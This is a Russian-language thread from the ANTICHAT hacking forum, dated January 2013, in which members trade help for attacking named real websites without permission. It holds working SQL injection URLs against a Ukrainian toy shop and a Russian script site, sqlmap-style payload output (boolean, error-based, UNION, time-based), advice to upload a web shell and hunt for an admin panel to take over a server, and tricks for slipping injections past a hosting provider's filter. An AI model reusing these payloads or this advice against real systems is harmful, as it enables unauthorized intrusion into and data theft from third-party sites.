HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.01.2013, 15:09
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

Цитата:
Сообщение от romasjanXXL  
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_prod uct кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз
Издеваетесь? Проще простого...Совсем народ оборзел.

Код:
http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product
 
Ответить с цитированием

  #2  
Старый 27.01.2013, 19:11
\/IRUS
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами: 7250006

Репутация: 37
По умолчанию

Есть скуля с правами ROOT

Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.

Что можно сделать чтобы порутать данный серв?
 
Ответить с цитированием

  #3  
Старый 27.01.2013, 19:15
Artrix
Новичок
Регистрация: 13.12.2012
Сообщений: 15
С нами: 7059926

Репутация: 0
По умолчанию

Цитата:
Сообщение от \/IRUS  
Есть скуля с правами ROOT
Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
Что можно сделать чтобы порутать данный серв?
Может для начала залить шелл? Ищи админку.
 
Ответить с цитированием

  #4  
Старый 27.01.2013, 19:16
\/IRUS
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами: 7250006

Репутация: 37
По умолчанию

Цитата:
Сообщение от Artrix  
Может для начала залить шелл? Ищи админку.
ищу просто уже вариантов нету
 
Ответить с цитированием

  #5  
Старый 27.01.2013, 19:36
LelouchMe
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами: 7342166

Репутация: 0
По умолчанию

Не пойму как правильно тут составить запрос... Хелп плс...

http://skyscript.ru/primer/skynews/?act=nov&news_id=1
 
Ответить с цитированием

  #6  
Старый 27.01.2013, 19:47
\/IRUS
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами: 7250006

Репутация: 37
По умолчанию

Цитата:
Сообщение от LelouchMe  
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1
Place: GET

Parameter: news_id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3

a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(

RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia

zZ

Type: UNION query

Title: MySQL UNION query (NULL) - 6 columns

Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x

51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc

вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23

пробелы ток убери
 
Ответить с цитированием

  #7  
Старый 27.01.2013, 19:48
ukrpunk
Познающий
Регистрация: 31.10.2011
Сообщений: 35
С нами: 7648886

Репутация: 5
По умолчанию

Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
 
Ответить с цитированием

  #8  
Старый 27.01.2013, 19:54
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

Цитата:
Сообщение от ukrpunk  
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
%0afrom table_name
 
Ответить с цитированием

  #9  
Старый 27.01.2013, 19:58
\/IRUS
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами: 7250006

Репутация: 37
По умолчанию

Цитата:
Сообщение от ukrpunk  
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
попробуй /**/from/**/table_name--
 
Ответить с цитированием

  #10  
Старый 28.01.2013, 08:07
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от \/IRUS  
попробуй /**/from/**/table_name--
SpaceWeb и это режет.

Там только %0a вместо порбелов помогает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.